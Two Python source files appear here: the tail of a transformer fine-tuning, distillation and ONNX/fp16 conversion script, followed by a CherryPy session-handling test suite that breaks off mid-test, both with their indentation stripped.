all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)
all_attention_mask = torch.tensor([f.attention_mask for f in features], dtype=torch.long)
all_token_type_ids = torch.tensor([f.token_type_ids for f in features], dtype=torch.long)
all_seq_lengths = torch.tensor([f.seq_length for f in features], dtype=torch.long)
if output_mode in ["classification", "span_classification"]:
all_labels = torch.tensor([f.label for f in features], dtype=torch.long)
elif output_mode == "regression":
all_labels = torch.tensor([f.label for f in features], dtype=torch.float)
if output_mode in ["span_classification"]:
# all_starts = torch.tensor([[s[0] for s in f.span_locs] for f in features], dtype=torch.long)
# all_ends = torch.tensor([[s[1] for s in f.span_locs] for f in features], dtype=torch.long)
all_spans = torch.tensor([f.span_locs for f in features])
dataset = TensorDataset(
all_input_ids, all_attention_mask, all_token_type_ids, all_labels, all_spans, all_seq_lengths, all_guids
)
else:
dataset = TensorDataset(all_input_ids, all_attention_mask, all_token_type_ids, all_labels, all_seq_lengths, all_guids)
logger.info("\tFinished converting features into tensors")
if args.local_rank in [-1, 0]:
logger.info("Saving features into cached file %s", cached_tensors_file)
torch.save(dataset, cached_tensors_file)
logger.info("\tFinished saving tensors")
if args.task_name == "record" and split in ["dev", "test"]:
answers = processor.get_answers(args.data_dir, split)
return dataset, answers
else:
return dataset
def convert_model_to_onnx(args):
"""Converts a pytorch model checkpoint to an ONNX model."""
from torch.onnx import export
# Prepare task
args.task_name = args.task_name.lower()
assert args.task_name in processors, f"Task {args.task_name} not found!"
processor = processors[args.task_name]()
args.output_mode = output_modes[args.task_name]
label_list = processor.get_labels()
num_labels = len(label_list)
# Load pretrained model and tokenizer
args.model_type = args.model_type.lower()
config_class, tokenizer_class, model_classes = MODEL_CLASSES[args.model_type]
model_class = model_classes[args.output_mode]
# config
config = config_class.from_pretrained(
args.config_name if args.config_name else args.model_name_or_path,
num_labels=num_labels,
finetuning_task=args.task_name,
cache_dir=args.cache_dir if args.cache_dir else None,
)
if args.output_mode == "span_classification":
config.num_spans = task_spans[args.task_name]
# tokenizer
tokenizer = tokenizer_class.from_pretrained(
args.tokenizer_name if args.tokenizer_name else args.model_name_or_path,
do_lower_case=args.do_lower_case,
cache_dir=args.cache_dir if args.cache_dir else None,
)
tokens = tokenizer.encode_plus("This is a sample input.")
print(">>>>>>> Sample input: This is a sample input.")
print(tokens)
# model
model = model_class.from_pretrained(
args.model_name_or_path,
from_tf=bool(".ckpt" in args.model_name_or_path),
config=config,
cache_dir=args.cache_dir if args.cache_dir else None,
)
# Only CPU is supported
model.to(torch.device("cpu"))
model.eval()
print(">>>>>>> Model loaded.")
# onnx convert
input_names = ['input_ids', 'attention_mask']
output_names = ['output_0']
dynamic_axes = {
'attention_mask': {
0: 'batch',
1: 'sequence'
},
'input_ids': {
0: 'batch',
1: 'sequence'
},
'output_0': {
0: 'batch',
1: 'sequence'
}
}
if args.model_type in ["bert", "xlnet", "albert"]:
input_names.append('token_type_ids')
dynamic_axes["token_type_ids"] = {0: 'batch', 1: 'sequence'}
model_args = (torch.tensor(tokens['input_ids']).unsqueeze(0),
torch.tensor(tokens['attention_mask']).unsqueeze(0))
if args.model_type in ["bert", "xlnet", "albert"]:
model_args = model_args + (torch.tensor(tokens['token_type_ids']).unsqueeze(0),)
print(">>>>>>> ONNX conversion started!")
torch.onnx.export(
model,
model_args,
f=(args.model_name_or_path + "/model.onnx"),
input_names=input_names,
output_names=output_names,
dynamic_axes=dynamic_axes,
do_constant_folding=True,
use_external_data_format=False,
enable_onnx_checker=True,
opset_version=11,
)
print(">>>>>>> Model converted into ONNX format and saved as: ",
(args.model_name_or_path + "/model.onnx"))
# Optimize ONNX graph
if not args.skip_graph_optimization:
optimize_onnx_graph(args, config)
# Run ONNX model after conversion
from onnxruntime import InferenceSession, SessionOptions
from onnxruntime.capi.onnxruntime_pybind11_state import RuntimeException
print("Checking ONNX model loading from: {}".format(args.model_name_or_path + "/model.onnx"))
try:
onnx_options = SessionOptions()
sess = InferenceSession(args.model_name_or_path + "/model.onnx", onnx_options)
print("Model loaded successfully.")
if args.model_type in ["bert", "xlnet", "albert"]:
output_onnx = sess.run(None, {'input_ids': [tokens['input_ids']],
'attention_mask': [tokens['attention_mask']],
'token_type_ids': [tokens['token_type_ids']]})
else:
output_onnx = sess.run(None, {'input_ids': [tokens['input_ids']],
'attention_mask': [tokens['attention_mask']]})
print(output_onnx)
except RuntimeException as re:
print("Error while loading the model: {}".format(re))
def optimize_onnx_graph(args, config):
""" Optimize ONNX model with graph optimizations and quantizations """
import inspect
from onnxruntime.transformers.optimizer import optimize_model
from onnxruntime.transformers.onnx_model_bert import BertOptimizationOptions
# various graph optimization options.
# ZCode uses all the optimizations by default.
# Whether to use quantization or not can be selected optionally.
optimization_options = BertOptimizationOptions('bert')
optimization_options.enable_gelu = True
optimization_options.enable_layer_norm = True
optimization_options.enable_attention = True
optimization_options.enable_skip_layer_norm = True
optimization_options.enable_embed_layer_norm = True
optimization_options.enable_bias_skip_layer_norm = True
optimization_options.enable_bias_gelu = True
optimization_options.enable_gelu_approximation = False
logger.warning(">>>>>>> Start optimizing ONNX graph")
optimizer = optimize_model(args.model_name_or_path + "/model.onnx",
model_type='bert',
num_heads=0,
hidden_size=0,
optimization_options=optimization_options,
opt_level=0,
use_gpu=False,
only_onnxruntime=False)
optimizer.save_model_to_file(args.model_name_or_path + "/model.onnx")
# whether to skip quantization
if args.skip_quantization:
logger.warning(">>>>>>> Finished optimizing ONNX graph without quantization")
else:
from onnxruntime.quantization import quantize_dynamic, QuantType
import onnx
onnx_opt_model = onnx.load(args.model_name_or_path + "/model.onnx")
quantize_dynamic(args.model_name_or_path + "/model.onnx",
args.model_name_or_path + "/model.onnx",
op_types_to_quantize=['MatMul', 'Attention'],
weight_type=QuantType.QInt8,
per_channel=True,
reduce_range=True,
nodes_to_exclude=args.nodes_to_exclude,
extra_options={'WeightSymmetric': False, 'MatMulConstBOnly': True})
logger.warning(">>>>>>> Finished optimizing ONNX graph with quantization")
def convert_model_to_fp16(args):
"""Converts a fp32 pytorch model checkpoint to a fp16 checkpoint."""
# Prepare task
args.task_name = args.task_name.lower()
assert args.task_name in processors, f"Task {args.task_name} not found!"
processor = processors[args.task_name]()
args.output_mode = output_modes[args.task_name]
label_list = processor.get_labels()
num_labels = len(label_list)
# Load pretrained model and tokenizer
args.model_type = args.model_type.lower()
config_class, tokenizer_class, model_classes = MODEL_CLASSES[args.model_type]
model_class = model_classes[args.output_mode]
# config
config = config_class.from_pretrained(
args.config_name if args.config_name else args.model_name_or_path,
num_labels=num_labels,
finetuning_task=args.task_name,
cache_dir=args.cache_dir if args.cache_dir else None,
)
if args.output_mode == "span_classification":
config.num_spans = task_spans[args.task_name]
# tokenizer
tokenizer = tokenizer_class.from_pretrained(
args.tokenizer_name if args.tokenizer_name else args.model_name_or_path,
do_lower_case=args.do_lower_case,
cache_dir=args.cache_dir if args.cache_dir else None,
)
# model
model = model_class.from_pretrained(
args.model_name_or_path,
from_tf=bool(".ckpt" in args.model_name_or_path),
config=config,
cache_dir=args.cache_dir if args.cache_dir else None,
)
# model.to(args.device)
model.eval()
print(">>>>>>> Model loaded.")
# convert to fp16 and save into fp16 directory
model.half()
from pathlib import Path
Path(args.model_name_or_path + "/fp16").mkdir(exist_ok=True)
model.save_pretrained(args.model_name_or_path + "/fp16")
tokenizer.save_pretrained(args.model_name_or_path + "/fp16")
config.save_pretrained(args.model_name_or_path + "/fp16")
print(">>>>>>> Model converted into fp16 and saved into: ",
(args.model_name_or_path + "/fp16"))
def main():
parser = argparse.ArgumentParser()
# Required parameters
parser.add_argument(
"--data_dir",
default=None,
type=str,
required=False,
help="The input data dir. Should contain the .tsv files (or other data files) for the task.",
)
parser.add_argument(
"--teacher_model_type",
default=None,
type=str,
required=False,
help="Model type selected in the list for teacher model: " + ", ".join(MODEL_CLASSES.keys()),
)
parser.add_argument(
"--model_type",
default=None,
type=str,
required=True,
help="Model type selected in the list for student model: " + ", ".join(MODEL_CLASSES.keys()),
)
parser.add_argument(
"--teacher_model_name_or_path",
default=None,
type=str,
required=False,
help="Path to pre-trained teacher model or shortcut name selected in the list: " + ", ".join(ALL_MODELS),
)
parser.add_argument(
"--model_name_or_path",
default=None,
type=str,
required=True,
help="Path to pre-trained student model or shortcut name selected in the list: " + ", ".join(ALL_MODELS),
)
parser.add_argument(
"--task_name",
default=None,
type=str,
required=True,
help="The name of the task to train selected in the list: " + ", ".join(processors.keys()),
)
parser.add_argument(
"--output_dir",
default=None,
type=str,
required=False,
help="The output directory where the model predictions and checkpoints will be written.",
)
# Other parameters
parser.add_argument(
"--config_name", default="", type=str, help="Pretrained config name or path if not the same as model_name",
)
parser.add_argument(
"--tokenizer_name",
default="",
type=str,
help="Pretrained tokenizer name or path if not the same as model_name",
)
parser.add_argument(
"--cache_dir",
default="",
type=str,
help="Where do you want to store the pre-trained models downloaded from s3",
)
parser.add_argument(
"--max_seq_length",
default=512,
type=int,
help="The maximum total input sequence length after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded.",
)
parser.add_argument("--do_train", action="store_true", help="Whether to run training.")
parser.add_argument("--do_eval", action="store_true", help="Whether to run eval on the dev set.")
parser.add_argument(
"--use_onnxrt",
action="store_true",
help="Whether to ONNX runtime for inference evaluation. ONNX converted file needs to be in the same directory."
)
parser.add_argument(
"--do_prune",
action="store_true",
help="Whether to prune the model on the dev set. This prunes the model to the target number of heads and the number of FFN states."
)
parser.add_argument(
"--target_num_heads",
default=12,
type=int,
help="The number of attention heads after pruning/rewiring.",
)
parser.add_argument(
"--target_ffn_dim",
default=3072,
type=int,
help="The dimension of FFN intermediate layer after pruning/rewiring.",
)
parser.add_argument(
"--dont_normalize_importance_by_layer", action="store_true", help="Don't normalize importance score by layers"
)
parser.add_argument(
"--dont_normalize_global_importance",
action="store_true",
help="Don't normalize all importance scores between 0 and 1",
)
parser.add_argument(
"--log_evaluate_during_training",
action="store_true",
help="Run evaluation during training at each logging step.",
)
parser.add_argument(
"--do_lower_case", action="store_true", help="Set this flag if you are using an uncased model.",
)
parser.add_argument(
"--per_gpu_train_batch_size", default=8, type=int, help="Batch size per GPU/CPU for training.",
)
parser.add_argument(
"--per_instance_eval_batch_size", default=8, type=int, help="Batch size per GPU/CPU for evaluation.",
)
parser.add_argument(
"--gradient_accumulation_steps",
type=int,
default=1,
help="Number of updates steps to accumulate before performing a backward/update pass.",
)
parser.add_argument("--learning_rate", default=5e-5, type=float, help="The initial learning rate for Adam.")
parser.add_argument("--weight_decay", default=0.0, type=float, help="Weight decay if we apply some.")
parser.add_argument("--adam_epsilon", default=1e-8, type=float, help="Epsilon for Adam optimizer.")
parser.add_argument("--max_grad_norm", default=1.0, type=float, help="Max gradient norm.")
parser.add_argument(
"--num_train_epochs", default=3.0, type=float, help="Total number of training epochs to perform.",
)
parser.add_argument(
"--max_steps",
default=-1,
type=int,
help="If > 0: set total number of training steps to perform. Override num_train_epochs.",
)
parser.add_argument("--warmup_steps", default=0, type=int, help="Linear warmup over warmup_steps.")
parser.add_argument("--warmup_ratio", default=0, type=float, help="Linear warmup over warmup_steps as a float.")
parser.add_argument("--log_energy_consumption", action="store_true", help="Whether to track energy consumption")
parser.add_argument("--logging_steps", type=int, default=500, help="Log every X updates steps.")
parser.add_argument("--eval_and_save_steps", type=int, default=500, help="Save checkpoint every X updates steps.")
parser.add_argument("--save_only_best", action="store_true", help="Save only when hit best validation score.")
parser.add_argument(
"--eval_all_checkpoints",
action="store_true",
help="Evaluate all checkpoints starting with the same prefix as model_name ending and ending with step number",
)
parser.add_argument("--evaluate_test", action="store_true", help="Evaluate on the test splits.")
parser.add_argument("--skip_evaluate_dev", action="store_true", help="Skip final evaluation on the dev splits.")
parser.add_argument("--no_cuda", action="store_true", help="Avoid using CUDA when available")
parser.add_argument(
"--overwrite_output_dir", action="store_true", help="Overwrite the content of the output directory",
)
parser.add_argument(
"--overwrite_cache", action="store_true", help="Overwrite the cached training and evaluation sets",
)
parser.add_argument("--seed", type=int, default=42, help="random seed for initialization")
parser.add_argument(
"--fp16",
action="store_true",
help="Whether to use 16-bit (mixed) precision (through NVIDIA apex) instead of 32-bit",
)
parser.add_argument(
"--fp16_opt_level",
type=str,
default="O1",
help="For fp16: Apex AMP optimization level selected in ['O0', 'O1', 'O2', and 'O3']."
"See details at https://nvidia.github.io/apex/amp.html",
)
parser.add_argument("--use_gpuid", type=int, default=-1, help="Use a specific GPU only")
parser.add_argument("--local_rank", type=int, default=-1, help="For distributed training: local_rank")
parser.add_argument("--server_ip", type=str, default="", help="For distant debugging.")
parser.add_argument("--server_port", type=str, default="", help="For distant debugging.")
parser.add_argument("--convert_onnx", action="store_true", help="Convert a pytorch model to onnx format")
parser.add_argument("--convert_fp16", action="store_true", help="Convert a pytorch model to a half precision model")
parser.add_argument("--threads_per_instance", type=int, default=-1, help="Number of threads for one inference instance.")
parser.add_argument("--state_distill_cs", action="store_true", help="If this is using Cosine similarity for the hidden and embedding state distillation. vs. MSE")
parser.add_argument('--state_loss_ratio', type=float, default=0.1)
parser.add_argument('--att_loss_ratio', type=float, default=0.0)
parser.add_argument("--save_latest", action="store_true", help="Save the last checkpoint regardless of the score.")
parser.add_argument("--skip_graph_optimization", action="store_true", help="Whether to skip ONNX graph optimization.")
parser.add_argument("--skip_quantization", action="store_true", help="Whether to skip 8-bit quantization.")
parser.add_argument("--use_fixed_seq_length", action="store_true", help="Whether to use fixed sequence length.")
parser.add_argument("--nodes_to_exclude", nargs='*', default=[], help="Nodes to be excluded from quantization")
args = parser.parse_args()
# Setup logging
logging.basicConfig(
# format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
format="%(asctime)s: %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO if args.local_rank in [-1, 0] else logging.WARN,
)
if args.convert_onnx:
convert_model_to_onnx(args)
return
if args.convert_fp16:
convert_model_to_fp16(args)
return
# Launch impact tracker
if args.log_energy_consumption:
from experiment_impact_tracker.compute_tracker import ImpactTracker
logger.info("Launching impact tracker...")
tracker = ImpactTracker(args.output_dir)
tracker.launch_impact_monitor()
if (
os.path.exists(args.output_dir)
and os.listdir(args.output_dir)
and args.do_train
and not args.overwrite_output_dir
):
raise ValueError(
"Output directory ({}) already exists and is not empty. Use --overwrite_output_dir to overcome.".format(
args.output_dir
)
)
# Setup distant debugging if needed
if args.server_ip and args.server_port:
# Distant debugging - see https://code.visualstudio.com/docs/python/debugging#_attach-to-a-local-script
import ptvsd
print("Waiting for debugger attach")
ptvsd.enable_attach(address=(args.server_ip, args.server_port), redirect_output=True)
ptvsd.wait_for_attach()
# Setup CUDA, GPU & distributed training
if args.use_gpuid > -1:
device = args.use_gpuid
args.n_gpu = 1
elif args.local_rank == -1 or args.no_cuda:
device = torch.device("cuda" if torch.cuda.is_available() and not args.no_cuda else "cpu")
args.n_gpu = 0 if args.no_cuda else torch.cuda.device_count()
else: # Initializes the distributed backend which will take care of sychronizing nodes/GPUs
torch.cuda.set_device(args.local_rank)
device = torch.device("cuda", args.local_rank)
torch.distributed.init_process_group(backend="nccl")
args.n_gpu = 1
args.device = device
logger.warning(
"Process rank: %s, device: %s, n_gpu: %s, distributed training: %s, 16-bits training: %s",
args.local_rank,
device,
args.n_gpu,
bool(args.local_rank != -1),
args.fp16,
)
# Set seed
set_seed(args)
# Prepare task
args.task_name = args.task_name.lower()
assert args.task_name in processors, f"Task {args.task_name} not found!"
processor = processors[args.task_name]()
args.output_mode = output_modes[args.task_name]
label_list = processor.get_labels()
num_labels = len(label_list)
if args.use_onnxrt:
assert args.do_eval and not args.do_train, f"ONNX runtime can only be used for evaluation mode!"
# Do all the stuff you want only first process to do
# e.g. make sure only the first process will download model & vocab
if args.local_rank not in [-1, 0]:
torch.distributed.barrier()
# Load pretrained model and tokenizer
args.model_type = args.model_type.lower()
config_class, tokenizer_class, model_classes = MODEL_CLASSES[args.model_type]
model_class = model_classes[args.output_mode]
config = config_class.from_pretrained(
args.config_name if args.config_name else args.model_name_or_path,
num_labels=num_labels,
finetuning_task=args.task_name,
cache_dir=args.cache_dir if args.cache_dir else None,
)
if args.output_mode == "span_classification":
config.num_spans = task_spans[args.task_name]
tokenizer = tokenizer_class.from_pretrained(
args.tokenizer_name if args.tokenizer_name else args.model_name_or_path,
do_lower_case=args.do_lower_case,
cache_dir=args.cache_dir if args.cache_dir else None,
)
# For onnx model, it's loaded in the evaluation routine
if not args.use_onnxrt:
model = model_class.from_pretrained(
args.model_name_or_path,
from_tf=bool(".ckpt" in args.model_name_or_path),
config=config,
cache_dir=args.cache_dir if args.cache_dir else None,
)
if args.local_rank == 0:
torch.distributed.barrier() # Make sure only the first process in distributed training will download model & vocab
model.to(args.device)
logger.info("Training/evaluation parameters %s", args)
# Training
if args.do_train:
# normal training (fine-tuning)
if args.teacher_model_type is None or args.teacher_model_name_or_path is None:
train_dataset = load_and_cache_examples(args, args.task_name, tokenizer) #, evaluate=False)
global_step, tr_loss = train(args, train_dataset, model, tokenizer)
# distillation
else:
# Load pretrained teacher model (use the same tokenizer as student)
args.teacher_model_type = args.teacher_model_type.lower()
teacher_config_class, _, teacher_model_classes = MODEL_CLASSES[args.teacher_model_type]
teacher_model_class = teacher_model_classes[args.output_mode]
teacher_config = teacher_config_class.from_pretrained(
args.teacher_model_name_or_path,
num_labels=num_labels,
finetuning_task=args.task_name,
cache_dir=args.cache_dir if args.cache_dir else None,
)
if args.output_mode == "span_classification":
teacher_config.num_spans = task_spans[args.task_name]
teacher_model = teacher_model_class.from_pretrained(
args.teacher_model_name_or_path,
from_tf=bool(".ckpt" in args.teacher_model_name_or_path),
config=teacher_config,
cache_dir=args.cache_dir if args.cache_dir else None,
)
teacher_model.to(args.device)
train_dataset = load_and_cache_examples(args, args.task_name, tokenizer, split='train') # evaluate=False)
global_step, tr_loss = distill(
args,
train_dataset,
teacher_model,
model,
tokenizer)
logger.info(" global_step = %s, average loss = %s", global_step, tr_loss)
# Saving best-practices: if you use defaults names for the model, you can reload it using from_pretrained()
if args.do_train and (args.local_rank == -1 or torch.distributed.get_rank() == 0):
# Create output directory if needed
if not os.path.exists(args.output_dir) and args.local_rank in [-1, 0]:
os.makedirs(args.output_dir)
logger.info("Saving model checkpoint to %s", args.output_dir)
# Save a trained model, configuration and tokenizer using `save_pretrained()`.
# They can then be reloaded using `from_pretrained()`
model_to_save = (
model.module if hasattr(model, "module") else model
) # Take care of distributed/parallel training
model_to_save.save_pretrained(args.output_dir)
tokenizer.save_pretrained(args.output_dir)
# Good practice: save your training arguments together with the trained model
torch.save(args, os.path.join(args.output_dir, "training_args.bin"))
# Load a trained model and vocabulary that you have fine-tuned
model = model_class.from_pretrained(args.output_dir)
tokenizer = tokenizer_class.from_pretrained(args.output_dir)
model.to(args.device)
# Evaluation with the best checkpoint
if args.do_eval and args.local_rank in [-1, 0]:
tokenizer = tokenizer_class.from_pretrained(args.output_dir, do_lower_case=args.do_lower_case)
checkpoints = [os.path.join(args.output_dir, "checkpoint-best")]
if args.eval_all_checkpoints:
checkpoints = list(
os.path.dirname(c) for c in sorted(glob.glob(args.output_dir + "/**/" + WEIGHTS_NAME, recursive=True))
)
logging.getLogger("transformers.modeling_utils").setLevel(logging.WARN) # Reduce logging
logger.info("Evaluate the following checkpoints: %s", checkpoints)
for checkpoint in checkpoints:
global_step = checkpoint.split("-")[-1] # if len(checkpoints) > 1 else ""
prefix = checkpoint.split("/")[-1] if checkpoint.find("checkpoint") != -1 else ""
model = model_class.from_pretrained(checkpoint)
model.to(args.device)
if not args.skip_evaluate_dev:
result, preds, ex_ids = evaluate(args, args.task_name, model, tokenizer, prefix=prefix)
result = dict((f"{k}_{global_step}", v) for k, v in result.items())
if args.evaluate_test:
# Hack to handle diagnostic datasets
eval_task_names = ("rte", "ax-b", "ax-g") if args.task_name == "rte" else (args.task_name,)
for eval_task_name in eval_task_names:
result, preds, ex_ids = evaluate(
args, eval_task_name, model, tokenizer, split="test", prefix=prefix
)
processor = processors[eval_task_name]()
if args.task_name == "record":
answers = processor.get_answers(args.data_dir, "test")
processor.write_preds(preds, ex_ids, args.output_dir, answers=answers)
else:
processor.write_preds(preds, ex_ids, args.output_dir)
# Evaluation only
if args.do_eval and not args.do_train and args.local_rank in [-1, 0]:
# onnx based evaluation
if args.use_onnxrt:
from onnxruntime import ExecutionMode, InferenceSession, SessionOptions
onnx_options = SessionOptions()
onnx_options.intra_op_num_threads = args.threads_per_instance
onnx_options.execution_mode = ExecutionMode.ORT_SEQUENTIAL
if not args.skip_evaluate_dev:
result, preds, ex_ids = evaluate_ort_parallel(args, args.task_name, onnx_options, tokenizer, prefix="")
result = dict((f"{k}", v) for k, v in result.items())
if args.evaluate_test:
# Hack to handle diagnostic datasets
eval_task_names = (args.task_name,) # ("rte", "ax-b", "ax-g") if args.task_name == "rte" else (args.task_name,)
for eval_task_name in eval_task_names:
result, preds, ex_ids = evaluate_ort_parallel(
args, eval_task_name, onnx_options, tokenizer, split="test", prefix=""
)
processor = processors[eval_task_name]()
if args.task_name == "record":
answers = processor.get_answers(args.data_dir, "test")
processor.write_preds(preds, ex_ids, args.output_dir, answers=answers)
else:
processor.write_preds(preds, ex_ids, args.output_dir)
# network pruning
elif args.do_prune:
result, preds, ex_ids = prune_rewire(args, args.task_name, model, tokenizer, prefix="")
result = dict((f"{k}", v) for k, v in result.items())
print("before pruning" + str(result))
# evaluate after pruning
config = config_class.from_pretrained(
args.output_dir + "/pruned_" + str(int(args.target_num_heads)) + "_" + str(int(args.target_ffn_dim)) + "/",
num_labels=num_labels,
finetuning_task=args.task_name,
)
model = model_class.from_pretrained(args.output_dir + "/pruned_" + str(int(args.target_num_heads)) + "_" + str(int(args.target_ffn_dim)) + "/")
model.to(args.device)
result, preds, ex_ids = evaluate(args, args.task_name, model, tokenizer, prefix="")
result = dict((f"{k}", v) for k, v in result.items())
print("after pruning" + str(result))
# normal evaluation (pytorch)
else:
if not args.skip_evaluate_dev:
result, preds, ex_ids = evaluate(args, args.task_name, model, tokenizer, prefix="", use_tqdm=False)
result = dict((f"{k}", v) for k, v in result.items())
if args.evaluate_test:
# Hack to handle diagnostic datasets
eval_task_names = (args.task_name,) # ("rte", "ax-b", "ax-g") if args.task_name == "rte" else (args.task_name,)
for eval_task_name in eval_task_names:
result, preds, ex_ids = evaluate(
args, eval_task_name, model, tokenizer, split="test", prefix="", use_tqdm=False
)
processor = processors[eval_task_name]()
if args.task_name == "record":
answers = processor.get_answers(args.data_dir, "test")
processor.write_preds(preds, ex_ids, args.output_dir, answers=answers)
else:
processor.write_preds(preds, ex_ids, args.output_dir)
if __name__ == "__main__":
main()
|
test_session.py
|
import os
localDir = os.path.dirname(__file__)
import sys
import threading
import time
import cherrypy
from cherrypy._cpcompat import copykeys, HTTPConnection, HTTPSConnection
from cherrypy.lib import sessions
from cherrypy.lib.httputil import response_codes
def http_methods_allowed(methods=['GET', 'HEAD']):
method = cherrypy.request.method.upper()
if method not in methods:
cherrypy.response.headers['Allow'] = ", ".join(methods)
raise cherrypy.HTTPError(405)
cherrypy.tools.allow = cherrypy.Tool('on_start_resource', http_methods_allowed)
def setup_server():
class Root:
_cp_config = {'tools.sessions.on': True,
'tools.sessions.storage_type' : 'ram',
'tools.sessions.storage_path' : localDir,
'tools.sessions.timeout': (1.0 / 60),
'tools.sessions.clean_freq': (1.0 / 60),
}
def clear(self):
cherrypy.session.cache.clear()
clear.exposed = True
def data(self):
cherrypy.session['aha'] = 'foo'
return repr(cherrypy.session._data)
data.exposed = True
def testGen(self):
counter = cherrypy.session.get('counter', 0) + 1
cherrypy.session['counter'] = counter
yield str(counter)
testGen.exposed = True
def testStr(self):
counter = cherrypy.session.get('counter', 0) + 1
cherrypy.session['counter'] = counter
return str(counter)
testStr.exposed = True
def setsessiontype(self, newtype):
self.__class__._cp_config.update({'tools.sessions.storage_type': newtype})
if hasattr(cherrypy, "session"):
del cherrypy.session
cls = getattr(sessions, newtype.title() + 'Session')
if cls.clean_thread:
cls.clean_thread.stop()
cls.clean_thread.unsubscribe()
del cls.clean_thread
setsessiontype.exposed = True
setsessiontype._cp_config = {'tools.sessions.on': False}
def index(self):
sess = cherrypy.session
c = sess.get('counter', 0) + 1
time.sleep(0.01)
sess['counter'] = c
return str(c)
index.exposed = True
def keyin(self, key):
return str(key in cherrypy.session)
keyin.exposed = True
def delete(self):
cherrypy.session.delete()
sessions.expire()
return "done"
delete.exposed = True
def delkey(self, key):
del cherrypy.session[key]
return "OK"
delkey.exposed = True
def blah(self):
return self._cp_config['tools.sessions.storage_type']
blah.exposed = True
def iredir(self):
raise cherrypy.InternalRedirect('/blah')
iredir.exposed = True
def restricted(self):
return cherrypy.request.method
restricted.exposed = True
restricted._cp_config = {'tools.allow.on': True,
'tools.allow.methods': ['GET']}
def regen(self):
cherrypy.tools.sessions.regenerate()
return "logged in"
regen.exposed = True
def length(self):
return str(len(cherrypy.session))
length.exposed = True
def session_cookie(self):
# Must load() to start the clean thread.
cherrypy.session.load()
return cherrypy.session.id
session_cookie.exposed = True
session_cookie._cp_config = {
'tools.sessions.path': '/session_cookie',
'tools.sessions.name': 'temp',
'tools.sessions.persistent': False}
cherrypy.tree.mount(Root())
from cherrypy.test import helper
class SessionTest(helper.CPWebCase):
setup_server = staticmethod(setup_server)
def tearDown(self):
# Clean up sessions.
for fname in os.listdir(localDir):
if fname.startswith(sessions.FileSession.SESSION_PREFIX):
os.unlink(os.path.join(localDir, fname))
def test_0_Session(self):
self.getPage('/setsessiontype/ram')
self.getPage('/clear')
# Test that a normal request gets the same id in the cookies.
# Note: this wouldn't work if /data didn't load the session.
self.getPage('/data')
self.assertBody("{'aha': 'foo'}")
c = self.cookies[0]
self.getPage('/data', self.cookies)
self.assertEqual(self.cookies[0], c)
self.getPage('/testStr')
self.assertBody('1')
cookie_parts = dict([p.strip().split('=')
for p in self.cookies[0][1].split(";")])
# Assert there is an 'expires' param
self.assertEqual(set(cookie_parts.keys()),
set(['session_id', 'expires', 'Path']))
self.getPage('/testGen', self.cookies)
self.assertBody('2')
self.getPage('/testStr', self.cookies)
self.assertBody('3')
self.getPage('/data', self.cookies)
self.assertBody("{'aha': 'foo', 'counter': 3}")
self.getPage('/length', self.cookies)
self.assertBody('2')
self.getPage('/delkey?key=counter', self.cookies)
self.assertStatus(200)
self.getPage('/setsessiontype/file')
self.getPage('/testStr')
self.assertBody('1')
self.getPage('/testGen', self.cookies)
self.assertBody('2')
self.getPage('/testStr', self.cookies)
self.assertBody('3')
self.getPage('/delkey?key=counter', self.cookies)
self.assertStatus(200)
# Wait for the session.timeout (1 second)
time.sleep(2)
self.getPage('/')
self.assertBody('1')
self.getPage('/length', self.cookies)
self.assertBody('1')
# Test session __contains__
self.getPage('/keyin?key=counter', self.cookies)
self.assertBody("True")
cookieset1 = self.cookies
# Make a new session and test __len__ again
self.getPage('/')
self.getPage('/length', self.cookies)
self.assertBody('2')
# Test session delete
self.getPage('/delete', self.cookies)
self.assertBody("done")
self.getPage('/delete', cookieset1)
self.assertBody("done")
f = lambda: [x for x in os.listdir(localDir) if x.startswith('session-')]
self.assertEqual(f(), [])
# Wait for the cleanup thread to delete remaining session files
self.getPage('/')
f = lambda: [x for x in os.listdir(localDir) if x.startswith('session-')]
self.assertNotEqual(f(), [])
time.sleep(2)
self.assertEqual(f(), [])
def test_1_Ram_Concurrency(self):
self.getPage('/setsessiontype/ram')
self._test_Concurrency()
def test_2_File_Concurrency(self):
self.getPage('/setsessiontype/file')
self._test_Concurrency()
def _test_Concurrency(self):
client_thread_count = 5
request_count = 30
# Get initial cookie
self.getPage("/")
self.assertBody("1")
cookies = self.cookies
data_dict = {}
errors = []
def request(index):
if self.scheme == 'https':
c = HTTPSConnection('%s:%s' % (self.interface(), self.PORT))
else:
c = HTTPConnection('%s:%s' % (self.interface(), self.PORT))
for i in range(request_count):
c.putrequest('GET', '/')
for k, v in cookies:
c.putheader(k, v)
c.endheaders()
response = c.getresponse()
body = response.read()
if response.status != 200 or not body.isdigit():
errors.append((response.status, body))
else:
data_dict[index] = max(data_dict[index], int(body))
# Uncomment the following line to prove threads overlap.
## sys.stdout.write("%d " % index)
# Start <request_count> requests from each of
# <client_thread_count> concurrent clients
ts = []
for c in range(client_thread_count):
data_dict[c] = 0
t = threading.Thread(target=request, args=(c,))
ts.append(t)
t.start()
for t in ts:
t.join()
hitcount = max(data_dict.values())
expected = 1 + (client_thread_count * request_count)
for e in errors:
print(e)
self.assertEqual(hitcount, expected)
def test_3_Redirect(self):
# Start a new session
self.getPage('/testStr')
self.getPage('/iredir', self.cookies)
self.assertBody("file")
def test_4_File_deletion(self):
# Start a new session
self.getPage('/testStr')
# Delete the session file manually and retry.
id = self.cookies[0][1].split(";", 1)[0].split("=", 1)[1]
path = os.path.join(localDir, "session-" + id)
os.unlink(path)
self.getPage('/testStr', self.cookies)
def test_5_Error_paths(self):
self.getPage('/unknown/page')
self.assertErrorPage(404, "The path '/unknown/page' was not found.")
# Note: this path is *not* the same as above. The above
# takes a normal route through the session code; this one
# skips the session code's before_handler and only calls
# before_finalize (save) and on_end (close). So the session
# code has to survive calling save/close without init.
self.getPage('/restricted', self.cookies, method='POST')
self.assertErrorPage(405, response_codes[405][1])
def test_6_regenerate(self):
self.getPage('/testStr')
# grab the cookie ID
id1 = self.cookies[0][1].split(";", 1)[0].split("=", 1)[1]
self.getPage('/regen')
self.assertBody('logged in')
id2 = self.cookies[0][1].split(";", 1)[0].split("=", 1)[1]
self.assertNotEqual(id1, id2)
self.getPage('/testStr')
# grab the cookie ID
id1 = self.cookies[0][1].split(";", 1)[0].split("=", 1)[1]
self.getPage('/testStr',
headers=[('Cookie',
